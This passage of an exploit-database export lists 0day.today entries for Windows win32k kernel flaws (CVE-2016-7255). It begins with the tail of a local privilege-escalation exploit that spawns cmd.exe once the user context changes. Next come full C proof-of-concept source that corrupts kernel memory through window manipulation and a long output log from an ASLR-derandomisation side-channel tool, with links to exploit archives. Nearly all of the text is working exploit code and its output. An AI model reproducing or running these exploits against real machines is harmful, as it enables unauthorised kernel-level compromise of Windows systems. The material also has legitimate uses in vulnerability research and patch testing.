0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n NtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(hNtDll, \"NtQueryIntervalProfile\");\r\n \r\n if (!NtQueryIntervalProfile) {\r\n printf(\"\\t\\t[-] Failed Resolving NtQueryIntervalProfile: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n } \r\n NtQueryIntervalProfile(0x1337, &Interval);\r\n }\r\n \r\n \r\n while (1) {\r\n size = 256;\r\n GetUserName(post_username, &size);\r\n if (memcmp(post_username, pre_username, 256) != 0) break;\r\n }\r\n Sleep(2000);\r\n system(\"cmd.exe\");\r\n \r\n \r\n return 0;\r\n}\n\n# 0day.today [2018-01-04] #", "sourceHref": "https://0day.today/exploit/26645", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-03T09:00:04", "description": "Exploit for windows platform in category dos / poc", "cvss3": {}, "published": "2016-11-10T00:00:00", "type": "zdt", "title": "Microsoft Windows Kernel - win32k Denial of Service (MS16-135) Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-7255"], "modified": "2016-11-10T00:00:00", "id": "1337DAY-ID-26297", "href": "https://0day.today/exploit/description/26297", "sourceData": "/*\r\nSource: https://github.com/tinysec/public/tree/master/CVE-2016-7255\r\n \r\nFull Proof of Concept:\r\n \r\nhttps://github.com/tinysec/public/tree/master/CVE-2016-7255\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40745.zip\r\n \r\n********************************************************************\r\n Created: 2016-11-09 14:23:09\r\n Filename: main.c\r\n Author: root[at]TinySec.net\r\n Version 0.0.0.1\r\n Purpose: poc of cve-2016-0075\r\n*********************************************************************\r\n*/\r\n \r\n#include <windows.h>\r\n#include <wchar.h>\r\n#include <stdlib.h>\r\n#include <stdio.h>\r\n \r\n \r\n//////////////////////////////////////////////////////////////////////////\r\n#pragma comment(lib,\"ntdll.lib\")\r\n#pragma comment(lib,\"user32.lib\")\r\n \r\n#undef DbgPrint\r\nULONG __cdecl DbgPrintEx( IN ULONG ComponentId, IN ULONG Level, IN PCCH Format, IN ... );\r\nULONG __cdecl DbgPrint(__in char* Format, ...)\r\n{\r\n CHAR* pszDbgBuff = NULL;\r\n va_list VaList=NULL;\r\n ULONG ulRet = 0;\r\n \r\n do\r\n {\r\n pszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0 ,1024 * sizeof(CHAR));\r\n if (NULL == pszDbgBuff)\r\n {\r\n break;\r\n }\r\n RtlZeroMemory(pszDbgBuff,1024 * sizeof(CHAR));\r\n \r\n va_start(VaList,Format);\r\n \r\n _vsnprintf((CHAR*)pszDbgBuff,1024 - 1,Format,VaList);\r\n \r\n DbgPrintEx(77 , 0 , pszDbgBuff );\r\n OutputDebugStringA(pszDbgBuff);\r\n \r\n va_end(VaList);\r\n \r\n } while (FALSE);\r\n \r\n if (NULL != pszDbgBuff)\r\n {\r\n HeapFree( GetProcessHeap(), 0 , pszDbgBuff );\r\n pszDbgBuff = NULL;\r\n }\r\n \r\n return ulRet;\r\n}\r\n \r\n \r\n int _sim_key_down(WORD wKey)\r\n {\r\n INPUT stInput = {0};\r\n \r\n do\r\n {\r\n stInput.type = INPUT_KEYBOARD;\r\n stInput.ki.wVk = wKey;\r\n stInput.ki.dwFlags = 0;\r\n \r\n SendInput(1 , &stInput , sizeof(stInput) );\r\n \r\n } while (FALSE);\r\n \r\n return 0;\r\n}\r\n \r\n int _sim_key_up(WORD wKey)\r\n {\r\n INPUT stInput = {0};\r\n \r\n do\r\n {\r\n stInput.type = INPUT_KEYBOARD;\r\n stInput.ki.wVk = wKey;\r\n stInput.ki.dwFlags = KEYEVENTF_KEYUP;\r\n \r\n SendInput(1 , &stInput , sizeof(stInput) );\r\n \r\n } while (FALSE);\r\n \r\n return 0;\r\n}\r\n \r\n int _sim_alt_shift_esc()\r\n {\r\n int i = 0;\r\n \r\n do\r\n {\r\n _sim_key_down( VK_MENU );\r\n _sim_key_down( VK_SHIFT ); \r\n \r\n \r\n _sim_key_down( VK_ESCAPE);\r\n _sim_key_up( VK_ESCAPE);\r\n \r\n _sim_key_down( VK_ESCAPE);\r\n _sim_key_up( VK_ESCAPE);\r\n \r\n _sim_key_up( VK_MENU );\r\n _sim_key_up( VK_SHIFT ); \r\n \r\n \r\n } while (FALSE);\r\n \r\n return 0;\r\n}\r\n \r\n \r\n \r\n int _sim_alt_shift_tab(int nCount)\r\n {\r\n int i = 0;\r\n HWND hWnd = NULL;\r\n \r\n \r\n int nFinalRet = -1;\r\n \r\n do\r\n {\r\n _sim_key_down( VK_MENU );\r\n _sim_key_down( VK_SHIFT ); \r\n \r\n \r\n for ( i = 0; i < nCount ; i++)\r\n {\r\n _sim_key_down( VK_TAB);\r\n _sim_key_up( VK_TAB);\r\n \r\n Sleep(1000);\r\n \r\n }\r\n \r\n \r\n _sim_key_up( VK_MENU );\r\n _sim_key_up( VK_SHIFT ); \r\n } while (FALSE);\r\n \r\n return nFinalRet;\r\n}\r\n \r\n \r\n \r\nint or_address_value_4(__in void* pAddress)\r\n{\r\n WNDCLASSEXW stWC = {0};\r\n \r\n HWND hWndParent = NULL;\r\n HWND hWndChild = NULL;\r\n \r\n WCHAR* pszClassName = L\"cve-2016-7255\";\r\n WCHAR* pszTitleName = L\"cve-2016-7255\";\r\n \r\n void* pId = NULL;\r\n MSG stMsg = {0};\r\n \r\n do\r\n {\r\n \r\n stWC.cbSize = sizeof(stWC);\r\n stWC.lpfnWndProc = DefWindowProcW;\r\n stWC.lpszClassName = pszClassName;\r\n \r\n if ( 0 == RegisterClassExW(&stWC) )\r\n {\r\n break;\r\n }\r\n \r\n hWndParent = CreateWindowExW(\r\n 0,\r\n pszClassName,\r\n NULL,\r\n WS_OVERLAPPEDWINDOW|WS_VISIBLE,\r\n 0,\r\n 0,\r\n 360,\r\n 360,\r\n NULL,\r\n NULL,\r\n GetModuleHandleW(NULL),\r\n NULL\r\n );\r\n \r\n if (NULL == hWndParent)\r\n {\r\n break;\r\n }\r\n \r\n hWndChild = CreateWindowExW(\r\n 0,\r\n pszClassName,\r\n pszTitleName,\r\n WS_OVERLAPPEDWINDOW|WS_VISIBLE|WS_CHILD,\r\n 0,\r\n 0,\r\n 160,\r\n 160,\r\n hWndParent,\r\n NULL,\r\n GetModuleHandleW(NULL),\r\n NULL\r\n );\r\n \r\n if (NULL == hWndChild)\r\n {\r\n break;\r\n }\r\n \r\n #ifdef _WIN64\r\n pId = ( (UCHAR*)pAddress - 0x28 ); \r\n #else\r\n pId = ( (UCHAR*)pAddress - 0x14); \r\n #endif // #ifdef _WIN64\r\n \r\n SetWindowLongPtr(hWndChild , GWLP_ID , (LONG_PTR)pId );\r\n \r\n DbgPrint(\"hWndChild = 0x%p\\n\" , hWndChild);\r\n DebugBreak();\r\n \r\n ShowWindow(hWndParent , SW_SHOWNORMAL);\r\n \r\n SetParent(hWndChild , GetDesktopWindow() );\r\n \r\n SetForegroundWindow(hWndChild);\r\n \r\n _sim_alt_shift_tab(4);\r\n \r\n SwitchToThisWindow(hWndChild , TRUE);\r\n \r\n _sim_alt_shift_esc();\r\n \r\n \r\n while( GetMessage(&stMsg , NULL , 0 , 0) )\r\n { \r\n TranslateMessage(&stMsg);\r\n DispatchMessage(&stMsg);\r\n }\r\n \r\n \r\n } while (FALSE);\r\n \r\n if ( NULL != hWndParent )\r\n {\r\n DestroyWindow(hWndParent);\r\n hWndParent = NULL;\r\n }\r\n \r\n if ( NULL != hWndChild )\r\n {\r\n DestroyWindow(hWndChild);\r\n hWndChild = NULL;\r\n }\r\n \r\n UnregisterClassW(pszClassName , GetModuleHandleW(NULL) );\r\n \r\n return 0;\r\n}\r\n \r\nint __cdecl wmain(int nArgc, WCHAR** Argv)\r\n{\r\n do\r\n {\r\n or_address_value_4( (void*)0xFFFFFFFF );\r\n } while (FALSE);\r\n \r\n return 0;\r\n}\n\n# 0day.today [2018-01-03] #", "sourceHref": "https://0day.today/exploit/26297", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-02-18T17:25:55", "description": "Exploit for windows platform in category local exploits", "cvss3": {}, "published": "2016-11-24T00:00:00", "type": "zdt", "title": "Microsoft Windows Kernel win32k.sys - 'NtSetWindowLongPtr' Privilege Escalation (MS16-13", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-7255"], "modified": "2016-11-24T00:00:00", "id": "1337DAY-ID-26414", "href": "https://0day.today/exploit/description/26414", "sourceData": "Complete Proof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40823.zip\r\n \r\nI Know Where Your Page Lives: Derandomizing the latest Windows 10 Kernel - ZeroNights 2016\r\n \r\nRequirements\r\n \r\nIntel Processor (Haswell or newer)\r\nWindows 10 x64\r\nUsage\r\n \r\nRun ASLRSideChannelAttack.exe to get the PML4-Self-Ref entry:\r\n \r\nC:\\Users\\qa\\Desktop>ASLRSideChannelAttack.exe\r\n+] Setting thread affinity to CPU 0\r\n+] Getting all the potential PML4 SelfRef\r\n+] Mapping a page oracle\r\n+] Allocating probing target pages...\r\nAllocation 0: 0000020E339D0000\r\nAllocation 1: 0000020E339E0000\r\nAllocation 2: 0000020E339F0000\r\nAllocation 3: 0000020E33A00000\r\nAllocation 4: 0000020E33A10000\r\n--------------------------\r\n+] Check that Unammped and Mapped values are consistent across several executions!\r\n--------------------------\r\nUnmapped Initial: 256.683746\r\nMapped Initial: 203.692978\r\n--------------------------\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n--------------------------\r\nUnmapped: 247.440018\r\nMapped: 202.827560\r\n--------------------------\r\n \r\nPotential SelfRef: FFFF8140A0502810\r\n+] PTE FFFF81010719CE80 looks mapped! - Time: 207.127213\r\n+] PTE FFFF81010719CF00 looks mapped! - Time: 195.239563\r\n+] PTE FFFF81010719CF80 looks mapped! - Time: 192.401382\r\n+] PTE FFFF81010719D000 looks mapped! - Time: 197.297256\r\n+] PTE FFFF81010719D080 looks mapped! - Time: 194.501175\r\n+] PTE FFFF810804020100 looks mapped! - Time: 204.740097\r\n+] Removing 102 from initial array and pushing it into final array\r\nPotential SelfRef: FFFF81C0E0703818\r\n+] PTE FFFF81810719CE80 looks mapped! - Time: 200.837616\r\n+] PTE FFFF81810719CF00 looks mapped! - Time: 207.868774\r\n+] PTE FFFF81810719CF80 looks mapped! - Time: 208.949921\r\n+] PTE FFFF81810719D000 looks mapped! - Time: 202.525726\r\n+] PTE FFFF81810719D080 looks mapped! - Time: 208.673874\r\nTime difference exceed for ffff818804020100, retrying...\r\n+] PTE FFFF818804020100 looks mapped! - Time: 209.071213\r\n+] Removing 103 from initial array and pushing it into final array\r\nTime difference exceed for ffff824120904820, retrying...\r\nPotential SelfRef: FFFF824120904820\r\n+] PTE FFFF82010719CE80 looks mapped! - Time: 198.373642\r\nTime difference exceed for ffff82010719cf00, retrying...\r\n+] PTE FFFF82010719CF00 looks mapped! - Time: 206.213593\r\n+] PTE FFFF82010719CF80 looks mapped! - Time: 210.637344\r\n+] PTE FFFF82010719D000 looks mapped! - Time: 207.820862\r\n+] PTE FFFF82010719D080 looks mapped! - Time: 197.229263\r\n+] PTE FFFF820804020100 looks mapped! - Time: 204.585739\r\n+] Removing 104 from initial array and pushing it into final array\r\nPotential SelfRef: FFFF82C160B05828\r\n+] PTE FFFF82810719CE80 looks mapped! - Time: 216.981003\r\nTime difference exceed for ffff8341a0d06830, retrying...\r\nPotential SelfRef: FFFF8341A0D06830\r\n+] PTE FFFF83010719CE80 looks mapped! - Time: 201.957657\r\n+] PTE FFFF83010719CF00 looks mapped! - Time: 202.023697\r\n+] PTE FFFF83010719CF80 looks mapped! - Time: 212.651016\r\n+] PTE FFFF83010719D000 looks mapped! - Time: 214.013504\r\n+] PTE FFFF83010719D080 looks mapped! - Time: 191.688126\r\n+] PTE FFFF830804020100 looks mapped! - Time: 193.314758\r\n+] Removing 106 from initial array and pushing it into final array\r\nPotential SelfRef: FFFF83C1E0F07838\r\n+] PTE FFFF83810719CE80 looks mapped! - Time: 195.506973\r\n+] PTE FFFF83810719CF00 looks mapped! - Time: 193.697693\r\n+] PTE FFFF83810719CF80 looks mapped! - Time: 208.809097\r\n+] PTE FFFF83810719D000 looks mapped! - Time: 216.298660\r\n+] PTE FFFF83810719D080 looks mapped! - Time: 203.848816\r\n+] PTE FFFF838804020100 looks mapped! - Time: 204.008743\r\n+] Removing 107 from initial array and pushing it into final array\r\nTime difference exceed for ffff89c4e2713898, retrying...\r\nTime difference exceed for ffff8bc5e2f178b8, retrying...\r\nTime difference exceed for ffff8c46231188c0, retrying...\r\nUnmapped Initial: 248.508636\r\nMapped Initial: 207.139847\r\n--------------------------\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n--------------------------\r\nUnmapped: 236.360733\r\nMapped: 195.650040\r\n--------------------------\r\n \r\nPotential SelfRef: FFFF8140A0502810\r\n+] PTE FFFF81010719CE80 looks mapped! - Time: 197.312363\r\nPotential SelfRef: FFFF81C0E0703818\r\nTime difference exceed for ffff81810719ce80, retrying...\r\nTime difference exceed for ffff81810719ce80, retrying...\r\nTime difference exceed for ffff81810719ce80, retrying...\r\nTime difference exceed for ffff81810719ce80, retrying...\r\n+] PTE FFFF81810719CE80 looks mapped! - Time: 209.812393\r\nTime difference exceed for ffff81810719cf00, retrying...\r\n+] PTE FFFF81810719CF00 looks mapped! - Time: 207.951645\r\n+] PTE FFFF81810719CF80 looks mapped! - Time: 200.001724\r\n+] PTE FFFF81810719D000 looks mapped! - Time: 197.655167\r\n+] PTE FFFF81810719D080 looks mapped! - Time: 201.667160\r\n+] PTE FFFF818804020100 looks mapped! - Time: 195.728439\r\nPML4e: FFFF8140A0502810 - Index: 102\r\nPML4e: FFFF81C0E0703818 - Index: 103\r\nPML4e: FFFF824120904820 - Index: 104\r\nPML4e: FFFF8341A0D06830 - Index: 106\r\nPML4e: FFFF83C1E0F07838 - Index: 107\r\nKNOWN_UNMAPPED PTE: ffff818000000000\r\n-] Erasing 103 from final array\r\nPotential SelfRef: FFFF824120904820\r\n+] PTE FFFF82010719CE80 looks mapped! - Time: 206.883759\r\n+] PTE FFFF82010719CF00 looks mapped! - Time: 208.451019\r\n+] PTE FFFF82010719CF80 looks mapped! - Time: 201.073364\r\n+] PTE FFFF82010719D000 looks mapped! - Time: 203.052826\r\n+] PTE FFFF82010719D080 looks mapped! - Time: 194.115143\r\n+] PTE FFFF820804020100 looks mapped! - Time: 198.158585\r\nPML4e: FFFF8140A0502810 - Index: 102\r\nPML4e: FFFF824120904820 - Index: 104\r\nPML4e: FFFF8341A0D06830 - Index: 106\r\nPML4e: FFFF83C1E0F07838 - Index: 107\r\nKNOWN_UNMAPPED PTE: ffff820000000000\r\n-] Erasing 104 from final array\r\nPotential SelfRef: FFFF8341A0D06830\r\n+] PTE FFFF83010719CE80 looks mapped! - Time: 200.405823\r\n+] PTE FFFF83010719CF00 looks mapped! - Time: 201.572525\r\n+] PTE FFFF83010719CF80 looks mapped! - Time: 193.538040\r\n+] PTE FFFF83010719D000 looks mapped! - Time: 196.066254\r\n+] PTE FFFF83010719D080 looks mapped! - Time: 189.007034\r\n+] PTE FFFF830804020100 looks mapped! - Time: 197.613953\r\nPML4e: FFFF8140A0502810 - Index: 102\r\nPML4e: FFFF8341A0D06830 - Index: 106\r\nPML4e: FFFF83C1E0F07838 - Index: 107\r\nKNOWN_UNMAPPED PTE: ffff830000000000\r\n-] Erasing 106 from final array\r\nPotential SelfRef: FFFF83C1E0F07838\r\n+] PTE FFFF83810719CE80 looks mapped! - Time: 200.655380\r\nTime difference exceed for ffff83810719cf00, retrying...\r\nTime difference exceed for ffff83810719cf00, retrying...\r\nUnmapped Initial: 232.123840\r\nMapped Initial: 196.420654\r\n--------------------------\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n--------------------------\r\nUnmapped: 234.845581\r\nMapped: 187.862518\r\n--------------------------\r\n \r\nPotential SelfRef: FFFF8140A0502810\r\n+] PTE FFFF81010719CE80 looks mapped! - Time: 197.432938\r\n+] PTE FFFF81010719CF00 looks mapped! - Time: 191.731766\r\nTime difference exceed for ffff81010719cf80, retrying...\r\nTime difference exceed for ffff81010719cf80, retrying...\r\nTime difference exceed for ffff81010719cf80, retrying...\r\n+] PTE FFFF81010719CF80 looks mapped! - Time: 201.003784\r\n+] PTE FFFF81010719D000 looks mapped! - Time: 194.332733\r\n+] PTE FFFF81010719D080 looks mapped! - Time: 200.211182\r\n+] PTE FFFF810804020100 looks mapped! - Time: 199.812225\r\nPML4e: FFFF8140A0502810 - Index: 102\r\nPML4e: FFFF83C1E0F07838 - Index: 107\r\nKNOWN_UNMAPPED PTE: ffff810000000000\r\nTime difference exceed for ffff810000000000, retrying...\r\n-] Erasing 102 from final array\r\nTime difference exceed for ffff83c1e0f07838, retrying...\r\nPotential SelfRef: FFFF83C1E0F07838\r\nTime difference exceed for ffff83810719ce80, retrying...\r\nTime difference exceed for ffff83810719ce80, retrying...\r\nUnmapped Initial: 230.247162\r\nMapped Initial: 198.023987\r\n--------------------------\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n--------------------------\r\nUnmapped: 235.923035\r\nMapped: 191.605301\r\n--------------------------\r\n \r\nTime difference exceed for ffff83c1e0f07838, retrying...\r\nTime difference exceed for ffff83c1e0f07838, retrying...\r\nPotential SelfRef: FFFF83C1E0F07838\r\nTime difference exceed for ffff83810719ce80, retrying...\r\nTime difference exceed for ffff83810719ce80, retrying...\r\nTime difference exceed for ffff83810719ce80, retrying...\r\nTime difference exceed for ffff83810719ce80, retrying...\r\nTime difference exceed for ffff83810719ce80, retrying...\r\nUnmapped Initial: 258.041046\r\nMapped Initial: 210.309753\r\n--------------------------\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n--------------------------\r\nUnmapped: 238.757538\r\nMapped: 203.896240\r\n--------------------------\r\n \r\nPotential SelfRef: FFFF83C1E0F07838\r\n+] PTE FFFF83810719CE80 looks mapped! - Time: 210.036102\r\n+] PTE FFFF83810719CF00 looks mapped! - Time: 199.200836\r\n+] PTE FFFF83810719CF80 looks mapped! - Time: 204.575333\r\n+] PTE FFFF83810719D000 looks mapped! - Time: 197.218445\r\n+] PTE FFFF83810719D080 looks mapped! - Time: 203.334763\r\n+] PTE FFFF838804020100 looks mapped! - Time: 203.243607\r\nPML4e: FFFF83C1E0F07838 - Index: 107\r\nKNOWN_UNMAPPED PTE: ffff838000000000\r\n-] Erasing 107 from final array\r\nPotential SelfRef: FFFF82C160B05828\r\n+] PTE FFFF82810719CE80 looks mapped! - Time: 201.889221\r\n+] PTE FFFF82810719CF00 looks mapped! - Time: 201.679138\r\n+] PTE FFFF82810719CF80 looks mapped! - Time: 204.281006\r\n+] PTE FFFF82810719D000 looks mapped! - Time: 209.909943\r\n+] PTE FFFF82810719D080 looks mapped! - Time: 202.795639\r\n+] PTE FFFF828804020100 looks mapped! - Time: 196.754044\r\n+] Removing 105 from initial array and pushing it into final array\r\nTime difference exceed for ffff884422110880, retrying...\r\nTime difference exceed for ffff884422110880, retrying...\r\nTime difference exceed for ffff8ec763b1d8e8, retrying...\r\nTime difference exceed for ffff8ec763b1d8e8, retrying...\r\nTime difference exceed for ffff8ec763b1d8e8, retrying...\r\nTime difference exceed for ffff8ec763b1d8e8, retrying...\r\nTime difference exceed for ffff90c864321908, retrying...\r\nUnmapped Initial: 257.754272\r\nMapped Initial: 207.903702\r\n--------------------------\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n--------------------------\r\nUnmapped: 247.145935\r\nMapped: 207.792923\r\n--------------------------\r\n \r\nPotential SelfRef: FFFF82C160B05828\r\n+] PTE FFFF82810719CE80 looks mapped! - Time: 208.554092\r\n+] PTE FFFF82810719CF00 looks mapped! - Time: 206.517715\r\n+] PTE FFFF82810719CF80 looks mapped! - Time: 216.576614\r\n+] PTE FFFF82810719D000 looks mapped! - Time: 213.698837\r\n+] PTE FFFF82810719D080 looks mapped! - Time: 210.162796\r\n+] PTE FFFF828804020100 looks mapped! - Time: 208.765045\r\nPML4e: FFFF82C160B05828 - Index: 105\r\nKNOWN_UNMAPPED PTE: ffff828000000000\r\n-] Erasing 105 from final array\r\n-] Removing 100 as it seems to be unmapped\r\n-] Removing 101 as it seems to be unmapped\r\n-] Removing 108 as it seems to be unmapped\r\n-] Removing 109 as it seems to be unmapped\r\n-] Removing 10a as it seems to be unmapped\r\n-] Removing 10b as it seems to be unmapped\r\n-] Removing 10c as it seems to be unmapped\r\n-] Removing 10d as it seems to be unmapped\r\nTime difference exceed for ffff8743a1d0e870, retrying...\r\n-] Removing 10e as it seems to be unmapped\r\n-] Removing 10f as it seems to be unmapped\r\n-] Removing 110 as it seems to be unmapped\r\nTime difference exceed for ffff88c462311888, retrying...\r\n-] Removing 111 as it seems to be unmapped\r\n-] Removing 112 as it seems to be unmapped\r\n-] Removing 113 as it seems to be unmapped\r\nTime difference exceed for ffff8a45229148a0, retrying...\r\n-] Removing 114 as it seems to be unmapped\r\n-] Removing 115 as it seems to be unmapped\r\n-] Removing 116 as it seems to be unmapped\r\n-] Removing 117 as it seems to be unmapped\r\nTime difference exceed for ffffbc5e2f178bc0, retrying...\r\nTime difference exceed for ffffbc5e2f178bc0, retrying...\r\nTime difference exceed for ffffe8f47a3d1e88, retrying...\r\nPotential SelfRef: FFFFF67B3D9ECF60\r\n+] PTE FFFFF6010719CE80 looks mapped! - Time: 201.963379\r\n+] PTE FFFFF6010719CF00 looks mapped! - Time: 212.917694\r\n+] PTE FFFFF6010719CF80 looks mapped! - Time: 207.448502\r\n+] PTE FFFFF6010719D000 looks mapped! - Time: 203.673920\r\n+] PTE FFFFF6010719D080 looks mapped! - Time: 206.782059\r\n+] PTE FFFFF60804020100 looks mapped! - Time: 211.636246\r\n+] Removing 1ec from initial array and pushing it into final array\r\nUnmapped Initial: 233.678802\r\nMapped Initial: 214.496124\r\n--------------------------\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n--------------------------\r\nUnmapped: 250.585373\r\nMapped: 213.339661\r\n--------------------------\r\n \r\nPotential SelfRef: FFFFF67B3D9ECF60\r\n+] PTE FFFFF6010719CE80 looks mapped! - Time: 201.419174\r\n+] PTE FFFFF6010719CF00 looks mapped! - Time: 199.196457\r\n+] PTE FFFFF6010719CF80 looks mapped! - Time: 210.779861\r\n+] PTE FFFFF6010719D000 looks mapped! - Time: 199.642334\r\n+] PTE FFFFF6010719D080 looks mapped! - Time: 200.348160\r\n+] PTE FFFFF60804020100 looks mapped! - Time: 204.036926\r\nPML4e: FFFFF67B3D9ECF60 - Index: 1ec\r\nKNOWN_UNMAPPED PTE: fffff60000000000\r\nReal PML4 SelfRef Found: fffff67b3d9ecf60\r\nLeft in Potential Array: ffff8c46231188c0\r\nLeft in Potential Array: ffff8cc6633198c8\r\nLeft in Potential Array: ffff8d46a351a8d0\r\nLeft in Potential Array: ffff8dc6e371b8d8\r\nLeft in Potential Array: ffff8e472391c8e0\r\nLeft in Potential Array: ffff8ec763b1d8e8\r\nLeft in Potential Array: ffff8f47a3d1e8f0\r\nLeft in Potential Array: ffff8fc7e3f1f8f8\r\nLeft in Potential Array: ffff904824120900\r\nLeft in Potential Array: ffff90c864321908\r\nLeft in Potential Array: ffff9148a4522910\r\nLeft in Potential Array: ffff91c8e4723918\r\nLeft in Potential Array: ffff924924924920\r\nLeft in Potential Array: ffff92c964b25928\r\nLeft in Potential Array: ffff9349a4d26930\r\nLeft in Potential Array: ffff93c9e4f27938\r\nLeft in Potential Array: ffff944a25128940\r\nLeft in Potential Array: ffff94ca65329948\r\nLeft in Potential Array: ffff954aa552a950\r\nLeft in Potential Array: ffff95cae572b958\r\nLeft in Potential Array: ffff964b2592c960\r\nLeft in Potential Array: ffff96cb65b2d968\r\nLeft in Potential Array: ffff974ba5d2e970\r\nLeft in Potential Array: ffff97cbe5f2f978\r\nLeft in Potential Array: ffff984c26130980\r\nLeft in Potential Array: ffff98cc66331988\r\nLeft in Potential Array: ffff994ca6532990\r\nLeft in Potential Array: ffff99cce6733998\r\nLeft in Potential Array: ffff9a4d269349a0\r\nLeft in Potential Array: ffff9acd66b359a8\r\nLeft in Potential Array: ffff9b4da6d369b0\r\nLeft in Potential Array: ffff9bcde6f379b8\r\nLeft in Potential Array: ffff9c4e271389c0\r\nLeft in Potential Array: ffff9cce673399c8\r\nLeft in Potential Array: ffff9d4ea753a9d0\r\nLeft in Potential Array: ffff9dcee773b9d8\r\nLeft in Potential Array: ffff9e4f2793c9e0\r\nLeft in Potential Array: ffff9ecf67b3d9e8\r\nLeft in Potential Array: ffff9f4fa7d3e9f0\r\nLeft in Potential Array: ffff9fcfe7f3f9f8\r\nLeft in Potential Array: ffffa05028140a00\r\nLeft in Potential Array: ffffa0d068341a08\r\nLeft in Potential Array: ffffa150a8542a10\r\nLeft in Potential Array: ffffa1d0e8743a18\r\nLeft in Potential Array: ffffa25128944a20\r\nLeft in Potential Array: ffffa2d168b45a28\r\nLeft in Potential Array: ffffa351a8d46a30\r\nLeft in Potential Array: ffffa3d1e8f47a38\r\nLeft in Potential Array: ffffa45229148a40\r\nLeft in Potential Array: ffffa4d269349a48\r\nLeft in Potential Array: ffffa552a954aa50\r\nLeft in Potential Array: ffffa5d2e974ba58\r\nLeft in Potential Array: ffffa6532994ca60\r\nLeft in Potential Array: ffffa6d369b4da68\r\nLeft in Potential Array: ffffa753a9d4ea70\r\nLeft in Potential Array: ffffa7d3e9f4fa78\r\nLeft in Potential Array: ffffa8542a150a80\r\nLeft in Potential Array: ffffa8d46a351a88\r\nLeft in Potential Array: ffffa954aa552a90\r\nLeft in Potential Array: ffffa9d4ea753a98\r\nLeft in Potential Array: ffffaa552a954aa0\r\nLeft in Potential Array: ffffaad56ab55aa8\r\nLeft in Potential Array: ffffab55aad56ab0\r\nLeft in Potential Array: ffffabd5eaf57ab8\r\nLeft in Potential Array: ffffac562b158ac0\r\nLeft in Potential Array: ffffacd66b359ac8\r\nLeft in Potential Array: ffffad56ab55aad0\r\nLeft in Potential Array: ffffadd6eb75bad8\r\nLeft in Potential Array: ffffae572b95cae0\r\nLeft in Potential Array: ffffaed76bb5dae8\r\nLeft in Potential Array: ffffaf57abd5eaf0\r\nLeft in Potential Array: ffffafd7ebf5faf8\r\nLeft in Potential Array: ffffb0582c160b00\r\nLeft in Potential Array: ffffb0d86c361b08\r\nLeft in Potential Array: ffffb158ac562b10\r\nLeft in Potential Array: ffffb1d8ec763b18\r\nLeft in Potential Array: ffffb2592c964b20\r\nLeft in Potential Array: ffffb2d96cb65b28\r\nLeft in Potential Array: ffffb359acd66b30\r\nLeft in Potential Array: ffffb3d9ecf67b38\r\nLeft in Potential Array: ffffb45a2d168b40\r\nLeft in Potential Array: ffffb4da6d369b48\r\nLeft in Potential Array: ffffb55aad56ab50\r\nLeft in Potential Array: ffffb5daed76bb58\r\nLeft in Potential Array: ffffb65b2d96cb60\r\nLeft in Potential Array: ffffb6db6db6db68\r\nLeft in Potential Array: ffffb75badd6eb70\r\nLeft in Potential Array: ffffb7dbedf6fb78\r\nLeft in Potential Array: ffffb85c2e170b80\r\nLeft in Potential Array: ffffb8dc6e371b88\r\nLeft in Potential Array: ffffb95cae572b90\r\nLeft in Potential Array: ffffb9dcee773b98\r\nLeft in Potential Array: ffffba5d2e974ba0\r\nLeft in Potential Array: ffffbadd6eb75ba8\r\nLeft in Potential Array: ffffbb5daed76bb0\r\nLeft in Potential Array: ffffbbddeef77bb8\r\nLeft in Potential Array: ffffbc5e2f178bc0\r\nLeft in Potential Array: ffffbcde6f379bc8\r\nLeft in Potential Array: ffffbd5eaf57abd0\r\nLeft in Potential Array: ffffbddeef77bbd8\r\nLeft in Potential Array: ffffbe5f2f97cbe0\r\nLeft in Potential Array: ffffbedf6fb7dbe8\r\nLeft in Potential Array: ffffbf5fafd7ebf0\r\nLeft in Potential Array: ffffbfdfeff7fbf8\r\nLeft in Potential Array: ffffc06030180c00\r\nLeft in Potential Array: ffffc0e070381c08\r\nLeft in Potential Array: ffffc160b0582c10\r\nLeft in Potential Array: ffffc1e0f0783c18\r\nLeft in Potential Array: ffffc26130984c20\r\nLeft in Potential Array: ffffc2e170b85c28\r\nLeft in Potential Array: ffffc361b0d86c30\r\nLeft in Potential Array: ffffc3e1f0f87c38\r\nLeft in Potential Array: ffffc46231188c40\r\nLeft in Potential Array: ffffc4e271389c48\r\nLeft in Potential Array: ffffc562b158ac50\r\nLeft in Potential Array: ffffc5e2f178bc58\r\nLeft in Potential Array: ffffc6633198cc60\r\nLeft 